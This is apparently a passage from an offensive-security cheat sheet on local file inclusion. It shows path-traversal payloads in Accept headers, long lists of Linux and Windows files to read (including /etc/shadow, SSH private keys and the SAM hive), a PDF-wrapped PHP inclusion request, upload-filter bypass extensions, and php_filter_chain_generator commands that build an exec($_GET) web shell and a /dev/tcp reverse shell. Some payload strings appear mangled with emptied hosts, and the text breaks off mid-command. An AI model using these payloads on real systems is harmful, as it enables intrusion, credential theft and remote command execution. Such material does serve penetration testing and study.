Accept: ../../../../.././../../../../etc/passwd{%0D

Accept: ../../../../.././../../../../etc/passwd{%0A

Accept: ../../../../.././../../../../etc/passwd{%00

Accept: ../../../../.././../../../../etc/passwd{%0D{{

Accept: ../../../../.././../../../../etc/passwd{%0A{{

Accept: ../../../../.././../../../../etc/passwd{%00{{

```

##### Linux Files

```c

/app/etc/local.xml

/etc/passwd

/etc/shadow

/etc/aliases

/etc/anacrontab

/etc/apache2/apache2.conf

/etc/apache2/httpd.conf

/etc/apache2/sites-enabled/000-default.conf

/etc/at.allow

/etc/at.deny

/etc/bashrc

/etc/bootptab

/etc/chrootUsers

/etc/chttp.conf

/etc/cron.allow

/etc/cron.deny

/etc/crontab

/etc/cups/cupsd.conf

/etc/exports

/etc/fstab

/etc/ftpaccess

/etc/ftpchroot

/etc/ftphosts

/etc/groups

/etc/grub.conf

/etc/hosts

/etc/hosts.allow

/etc/hosts.deny

/etc/httpd/access.conf

/etc/httpd/conf/httpd.conf

/etc/httpd/httpd.conf

/etc/httpd/logs/access_log

/etc/httpd/logs/access.log

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/etc/httpd/php.ini

/etc/httpd/srm.conf

/etc/inetd.conf

/etc/inittab

/etc/issue

/etc/knockd.conf

/etc/lighttpd.conf

/etc/lilo.conf

/etc/logrotate.d/ftp

/etc/logrotate.d/proftpd

/etc/logrotate.d/vsftpd.log

/etc/lsb-release

/etc/motd

/etc/modules.conf

/etc/motd

/etc/mtab

/etc/my.cnf

/etc/my.conf

/etc/mysql/my.cnf

/etc/network/interfaces

/etc/networks

/etc/npasswd

/etc/passwd

/etc/php4.4/fcgi/php.ini

/etc/php4/apache2/php.ini

/etc/php4/apache/php.ini

/etc/php4/cgi/php.ini

/etc/php4/apache2/php.ini

/etc/php5/apache2/php.ini

/etc/php5/apache/php.ini

/etc/php/apache2/php.ini

/etc/php/apache/php.ini

/etc/php/cgi/php.ini

/etc/php.ini

/etc/php/php4/php.ini

/etc/php/php.ini

/etc/printcap

/etc/profile

/etc/proftp.conf

/etc/proftpd/proftpd.conf

/etc/pure-ftpd.conf

/etc/pureftpd.passwd

/etc/pureftpd.pdb

/etc/pure-ftpd/pure-ftpd.conf

/etc/pure-ftpd/pure-ftpd.pdb

/etc/pure-ftpd/putreftpd.pdb

/etc/redhat-release

/etc/resolv.conf

/etc/samba/smb.conf

/etc/snmpd.conf

/etc/ssh/ssh_config

/etc/ssh/sshd_config

/etc/ssh/ssh_host_dsa_key

/etc/ssh/ssh_host_dsa_key.pub

/etc/ssh/ssh_host_key

/etc/ssh/ssh_host_key.pub

/etc/sysconfig/network

/etc/syslog.conf

/etc/termcap

/etc/vhcs2/proftpd/proftpd.conf

/etc/vsftpd.chroot_list

/etc/vsftpd.conf

/etc/vsftpd/vsftpd.conf

/etc/wu-ftpd/ftpaccess

/etc/wu-ftpd/ftphosts

/etc/wu-ftpd/ftpusers

/logs/pure-ftpd.log

/logs/security_debug_log

/logs/security_log

/opt/lampp/etc/httpd.conf

/opt/xampp/etc/php.ini

/proc/cmdline

/proc/cpuinfo

/proc/filesystems

/proc/interrupts

/proc/ioports

/proc/meminfo

/proc/modules

/proc/mounts

/proc/net/arp

/proc/net/tcp

/proc/net/udp

/proc//cmdline

/proc//maps

/proc/sched_debug

/proc/self/cwd/app.py

/proc/self/environ

/proc/self/net/arp

/proc/stat

/proc/swaps

/proc/version

/root/anaconda-ks.cfg

/usr/etc/pure-ftpd.conf

/usr/lib/php.ini

/usr/lib/php/php.ini

/usr/local/apache/conf/modsec.conf

/usr/local/apache/conf/php.ini

/usr/local/apache/log

/usr/local/apache/logs

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access.log

/usr/local/apache/audit_log

/usr/local/apache/error_log

/usr/local/apache/error.log

/usr/local/cpanel/logs

/usr/local/cpanel/logs/access_log

/usr/local/cpanel/logs/error_log

/usr/local/cpanel/logs/license_log

/usr/local/cpanel/logs/login_log

/usr/local/cpanel/logs/stats_log

/usr/local/etc/httpd/logs/access_log

/usr/local/etc/httpd/logs/error_log

/usr/local/etc/php.ini

/usr/local/etc/pure-ftpd.conf

/usr/local/etc/pureftpd.pdb

/usr/local/lib/php.ini

/usr/local/php4/httpd.conf

/usr/local/php4/httpd.conf.php

/usr/local/php4/lib/php.ini

/usr/local/php5/httpd.conf

/usr/local/php5/httpd.conf.php

/usr/local/php5/lib/php.ini

/usr/local/php/httpd.conf

/usr/local/php/httpd.conf.ini

/usr/local/php/lib/php.ini

/usr/local/pureftpd/etc/pure-ftpd.conf

/usr/local/pureftpd/etc/pureftpd.pdn

/usr/local/pureftpd/sbin/pure-config.pl

/usr/local/www/logs/httpd_log

/usr/local/Zend/etc/php.ini

/usr/sbin/pure-config.pl

/var/adm/log/xferlog

/var/apache2/config.inc

/var/apache/logs/access_log

/var/apache/logs/error_log

/var/cpanel/cpanel.config

/var/lib/mysql/my.cnf

/var/lib/mysql/mysql/user.MYD

/var/local/www/conf/php.ini

/var/log/apache2/access_log

/var/log/apache2/access.log

/var/log/apache2/error_log

/var/log/apache2/error.log

/var/log/apache/access_log

/var/log/apache/access.log

/var/log/apache/error_log

/var/log/apache/error.log

/var/log/apache-ssl/access.log

/var/log/apache-ssl/error.log

/var/log/auth.log

/var/log/boot

/var/htmp

/var/log/chttp.log

/var/log/cups/error.log

/var/log/daemon.log

/var/log/debug

/var/log/dmesg

/var/log/dpkg.log

/var/log/exim_mainlog

/var/log/exim/mainlog

/var/log/exim_paniclog

/var/log/exim.paniclog

/var/log/exim_rejectlog

/var/log/exim/rejectlog

/var/log/faillog

/var/log/ftplog

/var/log/ftp-proxy

/var/log/ftp-proxy/ftp-proxy.log

/var/log/httpd-access.log

/var/log/httpd/access_log

/var/log/httpd/access.log

/var/log/httpd/error_log

/var/log/httpd/error.log

/var/log/httpsd/ssl.access_log

/var/log/httpsd/ssl_log

/var/log/kern.log

/var/log/lastlog

/var/log/lighttpd/access.log

/var/log/lighttpd/error.log

/var/log/lighttpd/lighttpd.access.log

/var/log/lighttpd/lighttpd.error.log

/var/log/mail.info

/var/log/mail.log

/var/log/maillog

/var/log/mail.warn

/var/log/message

/var/log/messages

/var/log/mysqlderror.log

/var/log/mysql.log

/var/log/mysql/mysql-bin.log

/var/log/mysql/mysql.log

/var/log/mysql/mysql-slow.log

/var/log/proftpd

/var/log/pureftpd.log

/var/log/pure-ftpd/pure-ftpd.log

/var/log/secure

/var/log/vsftpd.log

/var/log/wtmp

/var/log/xferlog

/var/log/yum.log

/var/mysql.log

/var/run/utmp

/var/spool/cron/crontabs/root

/var/webmin/miniserv.log

/var/www/html/__init__.py

/var/www/html/db_connect.php

/var/www/html/utils.php

/var/www/log/access_log

/var/www/log/error_log

/var/www/logs/access_log

/var/www/logs/error_log

/var/www/logs/access.log

/var/www/logs/error.log

~/.atfp_history

~/.bash_history

~/.bash_logout

~/.bash_profile

~/.bashrc

~/.gtkrc

~/.login

~/.logout

~/.mysql_history

~/.nano_history

~/.php_history

~/.profile

~/.ssh/authorized_keys

~/.ssh/id_dsa

~/.ssh/id_dsa.pub

~/.ssh/id_rsa

~/.ssh/id_rsa.pub

~/.ssh/identity

~/.ssh/identity.pub

~/.viminfo

~/.wm_style

~/.Xdefaults

~/.xinitrc

~/.Xresources

~/.xsession

```

##### Windows Files

```c

C:/Users/Administrator/NTUser.dat

C:/Documents and Settings/Administrator/NTUser.dat

C:/apache/logs/access.log

C:/apache/logs/error.log

C:/apache/php/php.ini

C:/boot.ini

C:/inetpub/wwwroot/global.asa

C:/MySQL/data/hostname.err

C:/MySQL/data/mysql.err

C:/MySQL/data/mysql.log

C:/MySQL/my.cnf

C:/MySQL/my.ini

C:/php4/php.ini

C:/php5/php.ini

C:/php/php.ini

C:/Program Files/Apache Group/Apache2/conf/httpd.conf

C:/Program Files/Apache Group/Apache/conf/httpd.conf

C:/Program Files/Apache Group/Apache/logs/access.log

C:/Program Files/Apache Group/Apache/logs/error.log

C:/Program Files/FileZilla Server/FileZilla Server.xml

C:/Program Files/MySQL/data/hostname.err

C:/Program Files/MySQL/data/mysql-bin.log

C:/Program Files/MySQL/data/mysql.err

C:/Program Files/MySQL/data/mysql.log

C:/Program Files/MySQL/my.ini

C:/Program Files/MySQL/my.cnf

C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err

C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log

C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err

C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log

C:/Program Files/MySQL/MySQL Server 5.0/my.cnf

C:/Program Files/MySQL/MySQL Server 5.0/my.ini

C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf

C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf

C:/Program Files (x86)/Apache Group/Apache/conf/access.log

C:/Program Files (x86)/Apache Group/Apache/conf/error.log

C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml

C:/Program Files (x86)/xampp/apache/conf/httpd.conf

C:/WINDOWS/php.ini

C:/WINDOWS/Repair/SAM

C:/Windows/repair/system

C:/Windows/repair/software

C:/Windows/repair/security

C:/WINDOWS/System32/drivers/etc/hosts

C:/Windows/win.ini

C:/WINNT/php.ini

C:/WINNT/win.ini

C:/xampp/apache/bin/php.ini

C:/xampp/apache/logs/access.log

C:/xampp/apache/logs/error.log

C:/Windows/Panther/Unattend/Unattended.xml

C:/Windows/Panther/Unattended.xml

C:/Windows/debug/NetSetup.log

C:/Windows/system32/config/AppEvent.Evt

C:/Windows/system32/config/SecEvent.Evt

C:/Windows/system32/config/default.sav

C:/Windows/system32/config/security.sav

C:/Windows/system32/config/software.sav

C:/Windows/system32/config/system.sav

C:/Windows/system32/config/regback/default

C:/Windows/system32/config/regback/sam

C:/Windows/system32/config/regback/security

C:/Windows/system32/config/regback/system

C:/Windows/system32/config/regback/software

C:/Program Files/MySQL/MySQL Server 5.1/my.ini

C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml

C:/Windows/System32/inetsrv/config/applicationHost.config

C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

```

#### PDF PHP Inclusion

Create a file with a PDF header, which contains PHP code.

```c

%PDF-1.4

```

```c

http:///index.php?page=uploads/.pdf%00&cmd=whoami

```

#### PHP Upload Filter Bypasses

```c

.sh

.cgi

.inc

.txt

.pht

.phtml

.phP

.Php

.php3

.php4

.php5

.php7

.pht

.phps

.phar

.phpt

.pgif

.phtml

.phtm

.php%00.jpeg

```

```c

.php%20

.php%0d%0a.jpg

.php%0a

.php.jpg

.php%00.gif

.php\x00.gif

.php%00.png

.php\x00.png

.php%00.jpg

.php\x00.jpg

mv .jpg .php\x00.jpg

```

#### PHP Filter Chain Generator

> https://github.com/synacktiv/php_filter_chain_generator

```c

python3 php_filter_chain_generator.py --chain '= exec($_GET[0]); ?>'

python3 php_filter_chain_generator.py --chain ""

python3 php_filter_chain_generator.py --chain """"""

python3 php_filter_chain_generator.py --chain """"& /dev/tcp// 0>&1'"");?>""""

python3 php_filter_chain_generator.py --chain """"& /dev/tcp//